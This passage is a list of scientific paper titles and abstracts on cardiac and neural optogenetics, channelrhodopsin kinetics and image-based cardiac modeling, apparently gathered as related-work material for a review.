mechanism), but also the homogenization of tension development and strain. ::: ::: Conclusions In individuals with effective Frank–Starling mechanism, the length dependence of tension facilitates the homogenization of stress and strain. This can result in synchronous contraction despite asynchronous electrical activation. In these individuals, synchronizing electrical activation through CRT may have minimal benefit. --- paper_title: Millisecond-timescale, genetically targeted optical control of neural activity paper_content: Temporally precise, noninvasive control of activity in well-defined neuronal populations is a long-sought goal of systems neuroscience. We adapted for this purpose the naturally occurring algal protein Channelrhodopsin-2, a rapidly gated light-sensitive cation channel, by using lentiviral gene delivery in combination with high-speed optical switching to photostimulate mammalian neurons. We demonstrate reliable, millisecond-timescale control of neuronal spiking, as well as control of excitatory and inhibitory synaptic transmission. This technology allows the use of light to alter neural processing at the level of single spikes and synaptic events, yielding a widely applicable tool for neuroscientists and biomedical engineers. --- paper_title: Molecular and Cellular Approaches for Diversifying and Extending Optogenetics paper_content: Optogenetic technologies employ light to control biological processes within targeted cells in vivo with high temporal precision. Here, we show that application of molecular trafficking principles can expand the optogenetic repertoire along several long-sought dimensions. Subcellular and transcellular trafficking strategies now permit (1) optical regulation at the far-red/infrared border and extension of optogenetic control across the entire visible spectrum, (2) increased potency of optical inhibition without increased light power requirement (nanoampere-scale chloride-mediated photocurrents that maintain the light sensitivity and reversible, step-like kinetic stability of earlier tools), and (3) generalizable strategies for targeting cells based not only on genetic identity, but also on morphology and tissue topology, to allow versatile targeting when promoters are not known or in genetically intractable organisms. Together, these results illustrate use of cell-biological principles to enable expansion of the versatile fast optogenetic technologies suitable for intact-systems biology and behavior. --- paper_title: "Beauty is a light in the heart": the transformative potential of optogenetics for clinical applications in cardiovascular medicine. paper_content: Optogenetics is an exciting new technology in which viral gene or cell delivery is used to inscribe light sensitivity in excitable tissue to enable optical control of bioelectric behavior. Initial progress in the fledgling domain of cardiac optogenetics has included in vitro expression of various light-sensitive proteins in cell monolayers and transgenic animals to demonstrate an array of potentially useful applications, including light-based pacing, silencing of spontaneous activity, and spiral wave termination. In parallel to these developments, the cardiac modeling community has developed a versatile computational framework capable of realistically simulating optogenetics in biophysically detailed, patient-specific representations of the human heart, enabling the exploration of potential clinical applications in a predictive virtual platform. Toward the ultimate goal of assessing the feasibility and potential impact of optogenetics-based therapies in cardiovascular medicine, this review provides (1) a detailed synopsis of in vivo, in vitro, and in silico developments in the field and (2) a critical assessment of how existing clinical technology for gene/cell delivery and intra-cardiac illumination could be harnessed to achieve such lofty goals as light-based arrhythmia termination. --- paper_title: Modulation of cardiac tissue electrophysiological properties with light-sensitive proteins. paper_content: AIMS ::: Optogenetics approaches, utilizing light-sensitive proteins, have emerged as unique experimental paradigms to modulate neuronal excitability. We aimed to evaluate whether a similar strategy could be used to control cardiac-tissue excitability. ::: ::: ::: METHODS AND RESULTS ::: A combined cell and gene therapy strategy was developed in which fibroblasts were transfected to express the light-activated depolarizing channel Channelrhodopsin-2 (ChR2). Patch-clamp studies confirmed the development of a robust inward current in the engineered fibroblasts following monochromatic blue-light exposure. The engineered cells were co-cultured with neonatal rat cardiomyocytes (or human embryonic stem cell-derived cardiomyocytes) and studied using a multielectrode array mapping technique. These studies revealed the ability of the ChR2-fibroblasts to electrically couple and pace the cardiomyocyte cultures at varying frequencies in response to blue-light flashes. Activation mapping pinpointed the source of this electrical activity to the engineered cells. Similarly, diffuse seeding of the ChR2-fibroblasts allowed multisite optogenetics pacing of the co-cultures, significantly shortening their electrical activation time and synchronizing contraction. Next, optogenetics pacing in an in vitro model of conduction block allowed the resynchronization of the tissue's electrical activity. Finally, the ChR2-fibroblasts were transfected to also express the light-sensitive hyperpolarizing proton pump Archaerhodopsin-T (Arch-T). Seeding of the ChR2/ArchT-fibroblasts allowed to either optogentically pace the cultures (in response to blue-light flashes) or completely suppress the cultures' electrical activity (following continuous illumination with 624 nm monochromatic light, activating ArchT). ::: ::: ::: CONCLUSIONS ::: The results of this proof-of-concept study highlight the unique potential of optogenetics for future biological pacemaking and resynchronization therapy applications and for the development of novel anti-arrhythmic strategies. --- paper_title: Optogenetic control of heart muscle in vitro and in vivo paper_content: Stimulation of the light-activated cation channel channelrhodopsin-2 can depolarize heart muscle in vitro and in vivo, resulting in precise localized stimulation and constant prolonged depolarization of genetically targeted cardiomyocytes and cardiac tissue. --- paper_title: Image-based left ventricular shape analysis for sudden cardiac death risk stratification. paper_content: BACKGROUND ::: Low left ventricular ejection fraction (LVEF), the main criterion used in the current clinical practice to stratify sudden cardiac death (SCD) risk, has low sensitivity and specificity. ::: ::: ::: OBJECTIVE ::: To uncover indices of left ventricular (LV) shape that differ between patients with a high risk of SCD and those with a low risk. ::: ::: ::: METHODS ::: By using clinical cardiac magnetic resonance imaging and computational anatomy tools, a novel computational framework to compare 3-dimensional LV endocardial surface curvedness, wall thickness, and relative wall thickness between patient groups was implemented. The framework was applied to cardiac magnetic resonance data of 61 patients with ischemic cardiomyopathy who were selected for prophylactic implantable cardioverter-defibrillator treatment on the basis of reduced LVEF. The patients were classified by outcome: group 0 had no events; group 1, arrhythmic events; and group 2, heart failure events. Segmental differences in LV shape were assessed. ::: ::: ::: RESULTS ::: Global LV volumes and mass were similar among groups. Compared with patients with no events, patients in groups 1 and 2 had lower mean shape metrics in all coronary artery regions, with statistical significance in 9 comparisons, reflecting wall thinning and stretching/flattening. ::: ::: ::: CONCLUSION ::: In patients with ischemic cardiomyopathy and low LVEF, there exist quantifiable differences in 3-dimensional endocardial surface curvedness, LV wall thickness, and LV relative wall thickness between those with no clinical events and those with arrhythmic or heart failure outcomes, reflecting adverse LV remodeling. This retrospective study is a proof of concept to demonstrate that regional LV remodeling indices have the potential to improve the personalized risk assessment for SCD. --- paper_title: Cardiac applications of optogenetics. paper_content: In complex multicellular systems, such as the brain or the heart, the ability to selectively perturb and observe the response of individual components at the cellular level and with millisecond resolution in time, is essential for mechanistic understanding of function. Optogenetics uses genetic encoding of light sensitivity (by the expression of microbial opsins) to provide such capabilities for manipulation, recording, and control by light with cell specificity and high spatiotemporal resolution. As an optical approach, it is inherently scalable for remote and parallel interrogation of biological function at the tissue level; with implantable miniaturized devices, the technique is uniquely suitable for in vivo tracking of function, as illustrated by numerous applications in the brain. Its expansion into the cardiac area has been slow. Here, using examples from published research and original data, we focus on optogenetics applications to cardiac electrophysiology, specifically dealing with the ability to manipulate membrane voltage by light with implications for cardiac pacing, cardioversion, cell communication, and arrhythmia research, in general. We discuss gene and cell delivery methods of inscribing light sensitivity in cardiac tissue, functionality of the light-sensitive ion channels within different types of cardiac cells, utility in probing electrical coupling between different cell types, approaches and design solutions to all-optical electrophysiology by the combination of optogenetic sensors and actuators, and specific challenges in moving towards in vivo cardiac optogenetics. --- paper_title: Multiple-Color Optical Activation, Silencing, and Desynchronization of Neural Activity, with Single-Spike Temporal Resolution paper_content: The quest to determine how precise neural activity patterns mediate computation, behavior, and pathology would be greatly aided by a set of tools for reliably activating and inactivating genetically targeted neurons, in a temporally precise and rapidly reversible fashion. Having earlier adapted a light-activated cation channel, channelrhodopsin-2 (ChR2), for allowing neurons to be stimulated by blue light, we searched for a complementary tool that would enable optical neuronal inhibition, driven by light of a second color. Here we report that targeting the codon-optimized form of the light-driven chloride pump halorhodopsin from the archaebacterium Natronomas pharaonis (hereafter abbreviated Halo) to genetically-specified neurons enables them to be silenced reliably, and reversibly, by millisecond-timescale pulses of yellow light. We show that trains of yellow and blue light pulses can drive high-fidelity sequences of hyperpolarizations and depolarizations in neurons simultaneously expressing yellow light-driven Halo and blue light-driven ChR2, allowing for the first time manipulations of neural synchrony without perturbation of other parameters such as spiking rates. The Halo/ChR2 system thus constitutes a powerful toolbox for multichannel photoinhibition and photostimulation of virally or transgenically targeted neural circuits without need for exogenous chemicals, enabling systematic analysis and engineering of the brain, and quantitative bioengineering of excitable cells. --- paper_title: Channelrhodopsin-2 and optical control of excitable cells paper_content: Electrically excitable cells are important in the normal functioning and in the pathophysiology of many biological processes. These cells are typically embedded in dense, heterogeneous tissues, rendering them difficult to target selectively with conventional electrical stimulation methods. The algal protein Channelrhodopsin-2 offers a new and promising solution by permitting minimally invasive, genetically targeted and temporally precise photostimulation. Here we explore technological issues relevant to the temporal precision, spatial targeting and physiological implementation of ChR2, in the context of other photostimulation approaches to optical control of excitable cells. --- paper_title: Cardiac optogenetics paper_content: Optogenetics is an emerging technology for optical interrogation and control of biological function with high specificity and high spatiotemporal resolution. Mammalian cells and tissues can be sensitized to respond to light by a relatively simple and well-tolerated genetic modification using microbial opsins (light-gated ion channels and pumps). These can achieve fast and specific excitatory or inhibitory response, offering distinct advantages over traditional pharmacological or electrical means of perturbation. Since the first demonstrations of utility in mammalian cells (neurons) in 2005, optogenetics has spurred immense research activity and has inspired numerous applications for dissection of neural circuitry and understanding of brain function in health and disease, applications ranging from in vitro to work in behaving animals. Only recently (since 2010), the field has extended to cardiac applications with less than a dozen publications to date. In consideration of the early phase of work on cardiac optogenetics and the impact of the technique in understanding another excitable tissue, the brain, this review is largely a perspective of possibilities in the heart. It covers the basic principles of operation of light-sensitive ion channels and pumps, the available tools and ongoing efforts in optimizing them, overview of neuroscience use, as well as cardiac-specific questions of implementation and ideas for best use of this emerging technology in the heart. --- paper_title: High-performance genetically targetable optical neural silencing by light-driven proton pumps paper_content: If the activity of genetically specified neurons is silenced in a temporally precise fashion, the roles of different cell classes in neural processes can be studied. Members of the class of light-driven outward proton pumps are now shown to mediate powerful, safe, multiple-colour silencing of neural activity. The gene archaerhodopsin-3 (Arch) enables near 100% silencing of neurons in the awake brain when virally expressed in the mouse cortex and illuminated with yellow light. --- paper_title: See the light: can optogenetics restore healthy heartbeats? And, if it can, is it really worth the effort? paper_content: Cardiac optogenetics is an exciting new methodology in which light-sensitive ion channels are expressed in heart tissue to enable optical control of bioelectricity. This technology has the potential to open new avenues for safely and effectively treating rhythm disorders in the heart with gentle beams of light. Recently, we developed a comprehensive framework for modeling cardiac optogenetics. Simulations conducted in this platform will provide insights to guide in vitro investigation and steer the development of therapeutic applications - these are the first steps toward clinical translation. In this editorial, we review literature relevant to light-sensitive protein delivery and intracardiac illumination to provide a holistic feasibility assessment for optogenetics-based arrhythmia termination therapy. We then draw on examples from computational work to show that the optical control paradigm has undeniable advantages that cannot be attained with conventional electrotherapy. Hence, we argue that cardiac optogenetics is more than a flashy substitute for current approaches. --- paper_title: Feasibility of image-based simulation to estimate ablation target in human ventricular arrhythmia. paper_content: BACKGROUND ::: Previous studies suggest that magnetic resonance imaging with late gadolinium enhancement (LGE) may identify slowly conducting tissues in scar-related ventricular tachycardia (VT). ::: ::: ::: OBJECTIVE ::: To test the feasibility of image-based simulation based on LGE to estimate ablation targets in VT. ::: ::: ::: METHODS ::: We conducted a retrospective study in 13 patients who had preablation magnetic resonance imaging for scar-related VT ablation. We used image-based simulation to induce VT and estimate target regions according to the simulated VT circuit. The estimated target regions were coregistered with the LGE scar map and the ablation sites from the electroanatomical map in the standard ablation approach. ::: ::: ::: RESULTS ::: In image-based simulation, VT was inducible in 12 (92.3%) patients. All VTs showed macroreentrant propagation patterns, and the narrowest width of estimated target region that an ablation line should span to prevent VT recurrence was 5.0 ± 3.4 mm. Of 11 patients who underwent ablation, the results of image-based simulation and the standard approach were consistent in 9 (82%) patients, where ablation within the estimated target region was associated with acute success (n = 8) and ablation outside the estimated target region was associated with failure (n = 1). In 1 (9%) case, the results of image-based simulation and the standard approach were inconsistent, where ablation outside the estimated target region was associated with acute success. ::: ::: ::: CONCLUSIONS ::: The image-based simulation can be used to estimate potential ablation targets of scar-related VT. The image-based simulation may be a powerful noninvasive tool for preprocedural planning of ablation procedures to potentially reduce the procedure time and complication rates. --- paper_title: Image-based models of cardiac structure with applications in arrhythmia and defibrillation studies paper_content: Abstract The objective of this article is to present a set of methods for constructing realistic computational models of cardiac structure from high-resolution structural and diffusion tensor magnetic resonance images and to demonstrate the applicability of the models in simulation studies. The structural image is segmented to identify various regions such as normal myocardium, ventricles, and infarct. A finite element mesh is generated from the processed structural data, and fiber orientations are assigned to the elements. The Purkinje system, when visible, is modeled using linear elements that interconnect a set of manually identified points. The methods were applied to construct 2 different models; and 2 simulation studies, which demonstrate the applicability of the models in the analysis of arrhythmia and defibrillation, were performed. The models represent cardiac structure with unprecedented detail for simulation studies. --- paper_title: An accurate, fast and robust method to generate patient-specific cubic Hermite meshes paper_content: Abstract In-silico continuum simulations of organ and tissue scale physiology often require a discretisation or mesh of the solution domain. Cubic Hermite meshes provide a smooth representation of anatomy that is well-suited for simulating large deformation mechanics. Models of organ mechanics and deformation have demonstrated significant potential for clinical application. However, the production of a personalised mesh from patient’s anatomy using medical images remains a major bottleneck in simulation workflows. To address this issue, we have developed an accurate, fast and automatic method for deriving patient-specific cubic Hermite meshes. The proposed solution customises a predefined template with a fast binary image registration step and a novel cubic Hermite mesh warping constructed using a variational technique. Image registration is used to retrieve the mapping field between the template mesh and the patient images. The variational warping technique then finds a smooth and accurate projection of this field into the basis functions of the mesh. Applying this methodology, cubic Hermite meshes are fitted to the binary description of shape with sub-voxel accuracy and within a few minutes, which is a significant advance over the existing state of the art methods. To demonstrate its clinical utility, a generic cubic Hermite heart biventricular model is personalised to the anatomy of four patients, and the resulting mechanical stability of these customised meshes is successfully demonstrated. --- paper_title: Multiple photocycles of channelrhodopsin. paper_content: Two rhodopsins with intrinsic ion conductance have been identified recently in Chlamydomonas reinhardtii. They were named "channelrhodopsins" ChR1 and ChR2. Both were expressed in Xenopus laevis oocytes, and their properties were studied qualitatively by two electrode voltage clamp techniques. ChR1 is specific for H+, whereas ChR2 conducts Na+, K+, Ca2+, and guanidinium. ChR2 responds to the onset of light with a peak conductance, followed by a smaller steady-state conductance. Upon a second stimulation, the peak is smaller and recovers to full size faster at high external pH. ChR1 was reported to respond with a steady-state conductance only but is demonstrated here to have a peak conductance at high light intensities too. We analyzed quantitatively the light-induced conductance of ChR1 and developed a reaction scheme that describes the photocurrent kinetics at various light conditions. ChR1 exists in two dark states, D1 and D2, that photoisomerize to the conducting states M1 and M2, respectively. Dark-adapted ChR1 is completely arrested in D1. M1 converts into D1 within milliseconds but, in addition, equilibrates with the second conducting state M2 that decays to the second dark state D2. Thus, light-adapted ChR1 represents a mixture of D1 and D2. D2 thermally reconverts to D1 in minutes, i.e., much slower than any reaction of the two photocycles. --- paper_title: ReaChR: a red-shifted variant of channelrhodopsin enables deep transcranial optogenetic excitation paper_content: Channelrhodopsins (ChRs) are used to optogenetically depolarize neurons. We engineered a variant of ChR, denoted red-activatable ChR (ReaChR), that is optimally excited with orange to red light (λ ∼590-630 nm) and offers improved membrane trafficking, higher photocurrents and faster kinetics compared to existing red-shifted ChRs. Red light is less scattered by tissue and is absorbed less by blood than the blue to green wavelengths that are required by other ChR variants. We used ReaChR expressed in the vibrissa motor cortex to drive spiking and vibrissa motion in awake mice when excited with red light through intact skull. Precise vibrissa movements were evoked by expressing ReaChR in the facial motor nucleus in the brainstem and illumination with red light through the external auditory canal. Thus, ReaChR enables transcranial optical activation of neurons in deep brain structures without the need to surgically thin the skull, form a transcranial window or implant optical fibers. --- paper_title: Genetically encoded molecular tools for light-driven silencing of targeted neurons paper_content: Abstract The ability to silence, in a temporally precise fashion, the electrical activity of specific neurons embedded within intact brain tissue, is important for understanding the role that those neurons play in behaviors, brain disorders, and neural computations. “Optogenetic” silencers, genetically encoded molecules that, when expressed in targeted cells within neural networks, enable their electrical activity to be quieted in response to pulses of light, are enabling these kinds of causal circuit analyses studies. Two major classes of optogenetic silencer are in broad use in species ranging from worm to monkey: light-driven inward chloride pumps, or halorhodopsins, and light-driven outward proton pumps, such as archaerhodopsins and fungal light-driven proton pumps. Both classes of molecule, when expressed in neurons via viral or other transgenic means, enable the targeted neurons to be hyperpolarized by light. We here review the current status of these sets of molecules, and discuss how they are being discovered and engineered. We also discuss their expression properties, ionic properties, spectral characteristics, and kinetics. Such tools may not only find many uses in the quieting of electrical activity for basic science studies but may also, in the future, find clinical uses for their ability to safely and transiently shut down cellular electrical activity in a precise fashion. --- paper_title: Channelrhodopsin-2, a directly light-gated cation-selective membrane channel paper_content: Microbial-type rhodopsins are found in archaea, prokaryotes, and eukaryotes. Some of them represent membrane ion transport proteins such as bacteriorhodopsin, a light-driven proton pump, or channelrhodopsin-1 (ChR1), a recently identified light-gated proton channel from the green alga Chlamydomonas reinhardtii. ChR1 and ChR2, a related microbial-type rhodopsin from C. reinhardtii, were shown to be involved in generation of photocurrents of this green alga. We demonstrate by functional expression, both in oocytes of Xenopus laevis and mammalian cells, that ChR2 is a directly light-switched cation-selective ion channel. This channel opens rapidly after absorption of a photon to generate a large permeability for monovalent and divalent cations. ChR2 desensitizes in continuous light to a smaller steady-state conductance. Recovery from desensitization is accelerated by extracellular H+ and negative membrane potential, whereas closing of the ChR2 ion channel is decelerated by intracellular H+. ChR2 is expressed mainly in C. reinhardtii under low-light conditions, suggesting involvement in photoreception in dark-adapted cells. The predicted seven-transmembrane alpha helices of ChR2 are characteristic for G protein-coupled receptors but reflect a different motif for a cation-selective ion channel. Finally, we demonstrate that ChR2 may be used to depolarize small or large cells, simply by illumination. --- paper_title: Optical mapping of optogenetically shaped cardiac action potentials paper_content: Light-mediated silencing and stimulation of cardiac excitability, an important complement to electrical stimulation, promises important discoveries and therapies. To date, cardiac optogenetics has been studied with patch-clamp, multielectrode arrays, video microscopy, and an all-optical system measuring calcium transients. The future lies in achieving simultaneous optical acquisition of excitability signals and optogenetic control, both with high spatio-temporal resolution. Here, we make progress by combining optical mapping of action potentials with concurrent activation of channelrhodopsin-2 (ChR2) or halorhodopsin (eNpHR3.0), via an all-optical system applied to monolayers of neonatal rat ventricular myocytes (NRVM). Additionally, we explore the capability of ChR2 and eNpHR3.0 to shape action-potential waveforms, potentially aiding the study of short/long QT syndromes that result from abnormal changes in action potential duration (APD). These results show the promise of an all-optical system to acquire action potentials with precise temporal optogenetics control, achieving a long-sought flexibility beyond the means of conventional electrical stimulation. --- paper_title: Modulation of cardiac tissue electrophysiological properties with light-sensitive proteins. paper_content: AIMS ::: Optogenetics approaches, utilizing light-sensitive proteins, have emerged as unique experimental paradigms to modulate neuronal excitability. We aimed to evaluate whether a similar strategy could be used to control cardiac-tissue excitability. ::: ::: ::: METHODS AND RESULTS ::: A combined cell and gene therapy strategy was developed in which fibroblasts were transfected to express the light-activated depolarizing channel Channelrhodopsin-2 (ChR2). Patch-clamp studies confirmed the development of a robust inward current in the engineered fibroblasts following monochromatic blue-light exposure. The engineered cells were co-cultured with neonatal rat cardiomyocytes (or human embryonic stem cell-derived cardiomyocytes) and studied using a multielectrode array mapping technique. These studies revealed the ability of the ChR2-fibroblasts to electrically couple and pace the cardiomyocyte cultures at varying frequencies in response to blue-light flashes. Activation mapping pinpointed the source of this electrical activity to the engineered cells. Similarly, diffuse seeding of the ChR2-fibroblasts allowed multisite optogenetics pacing of the co-cultures, significantly shortening their electrical activation time and synchronizing contraction. Next, optogenetics pacing in an in vitro model of conduction block allowed the resynchronization of the tissue's electrical activity. Finally, the ChR2-fibroblasts were transfected to also express the light-sensitive hyperpolarizing proton pump Archaerhodopsin-T (Arch-T). Seeding of the ChR2/ArchT-fibroblasts allowed to either optogentically pace the cultures (in response to blue-light flashes) or completely suppress the cultures' electrical activity (following continuous illumination with 624 nm monochromatic light, activating ArchT). ::: ::: ::: CONCLUSIONS ::: The results of this proof-of-concept study highlight the unique potential of optogenetics for future biological pacemaking and resynchronization therapy applications and for the development of novel anti-arrhythmic strategies. --- paper_title: Photocycles of Channelrhodopsin-2 paper_content: Recent developments have used light-activated channels or transporters to modulate neuronal activity. One such genetically-encoded modulator of activity, channelrhodopsin-2 (ChR2), depolarizes neurons in response to blue light. In this work, we first conducted electrophysiological studies of the photokinetics of hippocampal cells expressing ChR2, for various light stimulations. These and other experimental results were then used for systematic investigation of the previously proposed three-state and four-state models of the ChR2 photocycle. We show the limitations of the previously suggested three-state models and identify a four-state model that accurately follows the ChR2 photocurrents. We find that ChR2 currents decay biexponentially, a fact that can be explained by the four-state model. The model is composed of two closed (C1 and C2) and two open (O1 and O2) states, and our simulation results suggest that they might represent the dark-adapted (C1-O1) and light-adapted (C2-O2) branches. The crucial insight provided by the analysis of the new model is that it reveals an adaptation mechanism of the ChR2 molecule. Hence very simple organisms expressing ChR2 can use this form of light adaptation. --- paper_title: Independent optical excitation of distinct neural populations paper_content: Sequencing the transcriptomes of more than 100 species of alga yields new channelrhodopsins with promising properties for optogenetics. A far red–shifted channelrhodopsin, Chrimson, opens up new behavioral capabilities in Drosophila, and alongside a fast yet light-sensitive blue channelrhodopsin, Chronos, enables independent excitation of two neuronal populations in brain slices. --- paper_title: Channelrhodopsin2 Current During the Action Potential: “Optical AP Clamp” and Approximation paper_content: Channelrhodopsin2 Current During the Action Potential: “Optical AP Clamp” and Approximation --- paper_title: Light-induced termination of spiral wave arrhythmias by optogenetic engineering of atrial cardiomyocytes paper_content: Aims Atrial fibrillation (AF) is the most common cardiac arrhythmia and often involves reentrant electrical activation (e.g. spiral waves). Drug therapy for AF can have serious side effects including proarrhythmia, while electrical shock therapy is associated with discomfort and tissue damage. Hypothetically, forced expression and subsequent activation of light-gated cation channels in cardiomyocytes might deliver a depolarizing force sufficient for defibrillation, thereby circumventing the aforementioned drawbacks. We therefore investigated the feasibility of light-induced spiral wave termination through cardiac optogenetics. ::: ::: Methods and results Neonatal rat atrial cardiomyocyte monolayers were transduced with lentiviral vectors encoding light-activated Ca2+-translocating channelrhodopsin (CatCh; LV.CatCh∼eYFP↑) or eYFP (LV.eYFP↑) as control, and burst-paced to induce spiral waves rotating around functional cores. Effects of CatCh activation on reentry were investigated by optical and multi-electrode array (MEA) mapping. Western blot analyses and immunocytology confirmed transgene expression. Brief blue light pulses (10 ms/470 nm) triggered action potentials only in LV.CatCh∼eYFP↑-transduced cultures, confirming functional CatCh-mediated current. Prolonged light pulses (500 ms) resulted in reentry termination in 100% of LV.CatCh∼eYFP↑-transduced cultures ( n = 31) vs. 0% of LV.eYFP↑-transduced cultures ( n = 11). Here, CatCh activation caused uniform depolarization, thereby decreasing overall excitability (MEA peak-to-peak amplitude decreased 251.3 ± 217.1 vs. 9.2 ± 9.5 μV in controls). Consequently, functional coresize increased and phase singularities (PSs) drifted, leading to reentry termination by PS–PS or PS–boundary collisions. ::: ::: Conclusion This study shows that spiral waves in atrial cardiomyocyte monolayers can be terminated effectively by a light-induced depolarizing current, produced by the arrhythmogenic substrate itself, upon optogenetic engineering. These results provide proof-of-concept for shockless defibrillation. --- paper_title: Multiple-Color Optical Activation, Silencing, and Desynchronization of Neural Activity, with Single-Spike Temporal Resolution paper_content: The quest to determine how precise neural activity patterns mediate computation, behavior, and pathology would be greatly aided by a set of tools for reliably activating and inactivating genetically targeted neurons, in a temporally precise and rapidly reversible fashion. Having earlier adapted a light-activated cation channel, channelrhodopsin-2 (ChR2), for allowing neurons to be stimulated by blue light, we searched for a complementary tool that would enable optical neuronal inhibition, driven by light of a second color. Here we report that targeting the codon-optimized form of the light-driven chloride pump halorhodopsin from the archaebacterium Natronomas pharaonis (hereafter abbreviated Halo) to genetically-specified neurons enables them to be silenced reliably, and reversibly, by millisecond-timescale pulses of yellow light. We show that trains of yellow and blue light pulses can drive high-fidelity sequences of hyperpolarizations and depolarizations in neurons simultaneously expressing yellow light-driven Halo and blue light-driven ChR2, allowing for the first time manipulations of neural synchrony without perturbation of other parameters such as spiking rates. The Halo/ChR2 system thus constitutes a powerful toolbox for multichannel photoinhibition and photostimulation of virally or transgenically targeted neural circuits without need for exogenous chemicals, enabling systematic analysis and engineering of the brain, and quantitative bioengineering of excitable cells. --- paper_title: Ultra light-sensitive and fast neuronal activation with the Ca2+-permeable channelrhodopsin CatCh paper_content: In this Technical Report, Kleinlogel and colleagues created and characterized a new channelrhodopsin-2 mutant with an enhanced permeability to calcium. Dubbed CatCh (calcium translocating channelrhodopsin), this new variant's enhanced calcium permeability mediates an accelerated response time and voltage response that is ~70-fold more light sensitive than that of wild-type channelrhodopsin-2. --- paper_title: Computational Optogenetics: Empirically-Derived Voltage- and Light-Sensitive Channelrhodopsin-2 Model paper_content: Channelrhodospin-2 (ChR2), a light-sensitive ion channel, and its variants have emerged as new excitatory optogenetic tools not only in neuroscience, but also in other areas, including cardiac electrophysiology. An accurate quantitative model of ChR2 is necessary for in silico prediction of the response to optical stimulation in realistic tissue/organ settings. Such a model can guide the rational design of new ion channel functionality tailored to different cell types/tissues. Focusing on one of the most widely used ChR2 mutants (H134R) with enhanced current, we collected a comprehensive experimental data set of the response of this ion channel to different irradiances and voltages, and used these data to develop a model of ChR2 with empirically-derived voltage- and irradiance- dependence, where parameters were fine-tuned via simulated annealing optimization. This ChR2 model offers: 1) accurate inward rectification in the current-voltage response across irradiances; 2) empirically-derived voltage- and light-dependent kinetics (activation, deactivation and recovery from inactivation); and 3) accurate amplitude and morphology of the response across voltage and irradiance settings. Temperature-scaling factors (Q10) were derived and model kinetics was adjusted to physiological temperatures. Using optical action potential clamp, we experimentally validated model-predicted ChR2 behavior in guinea pig ventricular myocytes. The model was then incorporated in a variety of cardiac myocytes, including human ventricular, atrial and Purkinje cell models. We demonstrate the ability of ChR2 to trigger action potentials in human cardiomyocytes at relatively low light levels, as well as the differential response of these cells to light, with the Purkinje cells being most easily excitable and ventricular cells requiring the highest irradiance at all pulse durations. This new experimentally-validated ChR2 model will facilitate virtual experimentation in neural and cardiac optogenetics at the cell and organ level and provide guidance for the development of in vivo tools. --- paper_title: Spectral characteristics of the photocycle of channelrhodopsin-2 and its implication for channel function. paper_content: In 2003, channelrhodopsin-2 (ChR2) from Chlamydomonas reinhardtii was discovered to be a light-gated cation channel, and since that time the channel became an excellent tool to control by light neuronal cells in culture as well as in living animals with high temporal and spatial resolution in a noninvasive manner. However, little is known about the spectral properties and their relation to the channel function. We have expressed ChR2 in the yeast Pichia pastoris and purified the protein. Flash-photolysis data were combined with patch-clamp studies to elucidate the photocycle. The protein absorbs maximally at approximately 480 nm before light excitation and shows flash-induced absorbance changes with at least two different photointermediates. Four relaxation processes can be extracted from the time course that we have analysed in a linear model for the photocycle leading to the kinetic intermediates P(1) to P(4). A short-lived photointermediate at 400 nm, suggesting a deprotonation of the retinal Schiff base, is followed by a red-shifted (520 nm) species with a millisecond lifetime. The first three kinetic intermediates in the photocycle, P(1) to P(3), are described mainly by the red-shifted 520-nm species. The 400-nm species contributes to a smaller extent to P(1) and P(2). The fourth one, P(4), is spectroscopically almost identical with the ground state and lasts into the seconds time region. We compared the spectroscopic data to current measurements under whole-cell patch-clamp conditions on HEK 293 cells. The lifetimes of the spectroscopically and electrophysiologically determined intermediates are in excellent agreement. The intermediates P(2) and P(3) (absorbing at 520 nm) are identified as the cation permeating states of the channel. Under stationary light, a modulation of the photocurrent by green light (540 nm) was observed. We conclude that the red-shifted spectral species represents the open channel state, and the thermal relaxation of this intermediate, the transition from P(3) to P(4), is coupled to channel closing. --- paper_title: Computational models of optogenetic tools for controlling neural circuits with light paper_content: Optogenetics is a new neurotechnology innovation based on the creation of light sensitivity of neurons using gene technologies and remote light activation. Optogenetics allows for the first time straightforward targeted neural stimulation with practically no interference between multiple stimulation points since either light beam can be finely confined or the expression of light sensitive ion channels and pumps can be genetically targeted. Here we present a generalised computational modeling technique for various types of optogenetic mechanisms, which was implemented in the NEURON simulation environment. It was demonstrated on the example of a two classical mechanisms for cells optical activation and silencing: channelrhodopsin-2 (ChR2) and halorhodopsin (NpHR).We theoretically investigate the dynamics of the neural response of a layer 5 cortical pyramidal neuron (L5) to four different types of illuminations: 1) wide-field whole cell illumination 2) wide-field apical dendritic illumination 3) focal somatic illumination and 4) focal axon initial segment (AIS) illumination. We show that whole-cell illumination of halorhodopsin most effectively hyperpolarizes the neuron and is able to silence the cell even when driving input is present. However, when channelrhodopsin-2 and halorhodopsin are concurrently active, the relative location of each illumination determines whether the response is modulated with a balance towards depolarization. The methodology developed in this study will be significant to interpret and design optogenetic experiments and in the field of neuroengineering in general. --- paper_title: Alternans and spiral breakup in human ventricular tissue model paper_content: Ventricular fibrillation (VF) is one of the main causes of death in the Western world. According to one hypothesis, the chaotic excitation dynamics during VF are the result of dynamical instabilities in action potential duration (APD) the occurrence of which requires that the slope of the APD restitution curve exceeds 1. Other factors such as electrotonic coupling and cardiac memory also determine whether these instabilities can develop. In this paper we study the conditions for alternans and spiral breakup in human cardiac tissue. Therefore, we develop a new version of our human ventricular cell model, which is based on recent experimental measurements of human APD restitution and includes a more extensive description of intracellular calcium dynamics. We apply this model to study the conditions for electrical instability in single cells, for reentrant waves in a ring of cells, and for reentry in two-dimensional sheets of ventricular tissue. We show that an important determinant for the onset of instability is the recovery dynamics of the fast sodium current. Slower sodium current recovery leads to longer periods of spiral wave rotation and more gradual conduction velocity restitution, both of which suppress restitution-mediated instability. As a result, maximum restitution slopes considerably exceeding 1 (up to 1.5) may be necessary for electrical instability to occur. Although slopes necessary for the onset of instabilities found in our study exceed 1, they are within the range of experimentally measured slopes. Therefore, we conclude that steep APD restitution-mediated instability is a potential mechanism for VF in the human heart. --- paper_title: Stimulating Cardiac Muscle by Light: Cardiac Optogenetics by Cell Delivery paper_content: Background —After the recent cloning of light-sensitive ion channels and their expression in mammalian cells, a new field, optogenetics, emerged in neuroscience, allowing for precise perturbations of neural circuits by light. However, functionality of optogenetic tools has not been fully explored outside neuroscience; and a non-viral, non-embryogenesis based strategy for optogenetics has not been shown before. ::: ::: Methods and Results —We demonstrate the utility of optogenetics to cardiac muscle by a tandem cell unit (TCU) strategy, where non-excitable cells carry exogenous light-sensitive ion channels, and when electrically coupled to cardiomyocytes, produce optically-excitable heart tissue. A stable channelrhodopsin2 (ChR2) expressing cell line was developed, characterized and used as a cell delivery system. The TCU strategy was validated in vitro in cell pairs with adult canine myocytes 